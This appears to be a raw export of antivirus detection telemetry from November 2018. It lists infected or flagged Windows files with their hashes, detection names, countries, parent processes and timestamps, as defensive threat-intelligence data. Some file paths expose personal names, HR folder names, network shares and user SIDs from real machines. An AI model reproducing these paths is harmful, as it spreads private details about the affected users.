  Row(detection=Row(filename='831357cae8125c0d975200a1db8ab2ced920647d156c8027aab2d4e8d3c33411', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\831357CAE8125C0D975200A1DB8AB2CED920647D156C8027AAB2D4E8D3C33411', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='831357cae8125c0d975200a1db8ab2ced920647d156c8027aab2d4e8d3c33411', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:27:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141447-6c4ff5bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141447-6C4FF5BB', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:14:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153708-668eb21f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2e424b19\\AVSCAN-20181102-153642-63A8B258\\AVSCAN-20181102-153708-668EB21F', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:37:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dqnpbawp.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\DqNpbaWp.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tripeaks.exe', filepath='C:\\Program Files\\GameHouse\\AncientTripeaks\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='f241c5fe912b94290df3a653e8307377511a911a3dd1dbd1769514e13dac4411', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T03:00:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gclaw.exe', filepath='D:\\العاب حسين\\Claw\\gCLAW.EXE', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='f82c8ecd9f5b050b902d7d15f483d434b236ef766cfc036febb2fdc28d6de746', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T00:11:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111424-1004d099', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d0d898d\\AVSCAN-20181102-111221-005608EF\\AVSCAN-20181102-111424-1004D099', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='f6a5e73152a69edc3466a1a95ff1c13504c47df146bcf4c6763d481548aa6aec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:44:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:35:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152913-4479110d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_262c2b56\\AVSCAN-20181102-152822-3D0582D0\\AVSCAN-20181102-152913-4479110D', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='f9fa9c5568df932f012e04e81233b04456f4e8348d5760a7e2f7a0cb347fe52b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:29:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-045117-f5a7b504', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-045117-F5A7B504', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='efccc4625ac15467fb5d01f886edd7a5d169411d677e93ee6e53b2e0c35286cd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:53:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274020003.pif', filepath='F:\\scan-peta-wb-sp2010\\3274020WB\\3274020003\\3274020003.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110849-cf4709e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110849-CF4709E9', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ethdcrminer64.exe', filepath='\\\\?\\C:\\$RECYCLE.BIN\\S-1-5-21-153897562-1265273997-1534562455-1001\\$R31G5FB.3\\cuda7.5\\EthDcrMiner64.exe', filesize=5696000, name='HEUR/AGEN.1033248.#M1.#R1'), hash='caac48aa46538bc5815b44512a284c41de7a293e9bcc27ff64aef7e3c7622ec7', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:19:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cfp.exe', filepath='K:\\Miracle Box\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='c109eb9d57d215600ae384d7e1cd535d6f82ef0103f42858e8951980dc1fdd7d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T05:21:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\0m2ks1n4ahy\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:24:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='cc673a9e2d5f721c6f90e29ba50f18b6c61f91a3ba47f46e1c0c2ffd14947ffc', metadata=Row(cmdline='-k LocalServiceNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T04:31:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='verif3d.exe', filepath='\\\\ts-xelcea\\share\\francesca_computer_2012\\francesca\\LAVORO\\sts2011\\cdswin\\verif3d.exe', filesize=1984000, name='W32/Stanit.#M1.#R1'), hash='e7c4d9aee6f94fc3342107b58709f0026f8a6852d63ce62c9f0d19d81a76ba8f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:43:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='шайнуров.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка на 2015 год\\Шайнуров.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:52:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwr_toolbars_tb_08.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_Extending\\dwr_toolbars_tb_08.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='9addbc19b6296f9310bcca3c9db0c8729958c1f0b46409718fc15e53ee0bec08', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-02T07:10:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ee11549bcf761bbdcd2b2101b64d78b9f4c5ba33c930bc207a3bd9795b2ee67d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\EE11549BCF761BBDCD2B2101B64D78B9F4C5BA33C930BC207A3BD9795B2EE67D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ee11549bcf761bbdcd2b2101b64d78b9f4c5ba33c930bc207a3bd9795b2ee67d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:05:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T23:21:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296f7d', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296f7d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:37:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002398ef', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002398ef', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:44:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291550', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291550', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:50:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f45ff775783693214a5454f7d42964328450c655c1e295a27f9ebf608767db24', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F45FF775783693214A5454F7D42964328450C655C1E295A27F9EBF608767DB24', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='f45ff775783693214a5454f7d42964328450c655c1e295a27f9ebf608767db24', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:39:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tripeaks.exe', filepath='C:\\Program Files\\GameHouse\\AncientTripeaks\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='f241c5fe912b94290df3a653e8307377511a911a3dd1dbd1769514e13dac4411', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T02:23:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191402-de771fa0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d52d695b\\AVSCAN-20181104-190519-9EB7E399\\AVSCAN-20181104-191402-DE771FA0', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:17:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-101901-ed34cdc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_459c300c\\AVSCAN-20181104-100840-AC4E3947\\AVSCAN-20181104-101901-ED34CDC0', filesize=640000, name='W32/Small.L.#M1.#R1'), hash='cd1f14784298eab8e2aeb3b43979f34069b31deebe17eeac8e1d2d1d75333c54', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T03:19:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b1a4', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b1a4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:10:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{33BA526E-7A73-400D-A885-76294E813AFF} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-04T16:24:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='instal·lar memòria del projecte segons el cte.exe', filepath='C:\\Users\\X\\Desktop\\Eze\\Eze\\Programas\\CYPE\\cypeCAD2014p\\Instal·lació en català\\Instal·lar programes solts\\Instal·lar Memòria del projecte segons el CTE.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='d1c41c09134499740666fdfa06507e2303914015072d764ffcc5d0d87d58db36', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:29:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsm83B1.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\fotor_3.41.exe', parentsize=268416568, timestamp='2018-11-04T13:05:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201117-aff3bd2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d60937c3\\AVSCAN-20181104-200803-96184904\\AVSCAN-20181104-201117-AFF3BD2E', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:09:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='\\\\?\\D:\\cs\\cs16v2017_oyunyoneticisi\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='e30f3d27fd2b91cd7e41e29b2e6b9fd7ef4a163eb88a8dab8a00803d6d91ea34', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:00:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e27c71186eac9e81f01dd027ba1509bb228ecc9a', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\e27c71186eac9e81f01dd027ba1509bb228ecc9a', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='fe5b3f7cfcafd5a25e824e21ebdb09f651a5fb264572a20c080da4293a79e2bf', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:09:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f4a73fec983d82ba9d05da36e4b47ec223655196e048c7606eddd8e3b62e5f4c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\F4A73FEC983D82BA9D05DA36E4B47EC223655196E048C7606EDDD8E3B62E5F4C', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='f4a73fec983d82ba9d05da36e4b47ec223655196e048c7606eddd8e3b62e5f4c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T06:01:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000bce1', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2216\\tmp00000187\\tmp0000bce1', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='\\\\\\/service', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\N-able Technologies\\AVDefender\\epsecurityservice.exe', parentsize=452944, timestamp='2018-11-01T18:29:54Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='ftclean.exe', filepath='D:\\CPT\\โปรแกรม PLC Omron\\CXONE V4.1\\drivers\\USB\\7\\CS1W-CIF31\\FTClean.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='08e6f8fed603c8a9c670ca6fa5469ff66e9cf0b06acf666cd9afa5659839558e', metadata=Row(cmdline='\\/start', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\cpe17antiautorun1670.exe', parentsize=225280, timestamp='2018-11-02T03:41:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1_9_5_2.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_9_5_2.html', filesize=224000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='620a14eed744a75037f7de813dd9ac8eda37d57d006169656a4289a84eca5014', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T07:13:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='088a025fe8d60dbfb7599350caf243000f3427f14fe9967bb88d3f8f89a94c31', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\088A025FE8D60DBFB7599350CAF243000F3427F14FE9967BB88D3F8F89A94C31', filesize=128000, name='TR/Crypt.XPACK.Gen2.#M300.#R100604'), hash='088a025fe8d60dbfb7599350caf243000f3427f14fe9967bb88d3f8f89a94c31', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lawyers.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\LAWYERS\\LAWYERS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094852-01582f4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4578e2ab\\AVSCAN-20181102-094618-F09E6BDF\\AVSCAN-20181102-094852-01582F4A', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T17:48:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101540-899619e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_39e889cd\\AVSCAN-20181102-101520-856F6A5B\\AVSCAN-20181102-101540-899619E1', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000093c', filepath='\\\\?\\C:\\Windows\\Temp\\tmp00004416\\tmp0000093c', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='585c124e3a0eac4307584dc5f86533b09f8f7bed803c07c21925611d0c27a92b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160138-f7e5c24d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160138-F7E5C24D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='webapphost.dll', filepath='\\\\?\\C:\\Windows.old\\Users\\user\\AppData\\Local\\Temp\\nsb97A3.tmp\\webapphost.dll', filesize=756000, name='PUA/SearchProtect.Gen.#M300.#R6215'), hash='65b7afa0c263db4e3ff726247d5864ae4463c7618bd9756e486a2c206e97c09f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:56:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150700-262d1f4c', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-150634-21D50F9F\\AVSCAN-20181102-150700-262D1F4C', filesize=832000, name='HEUR/AGEN.1015942.#M1.#R1'), hash='5055563a85af1c46f43ebc410614c366dd95ffe9b813e70e25f36dcdf98f09b5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:06:13Z'), dt=datetime.date(2018, 11, 2)),
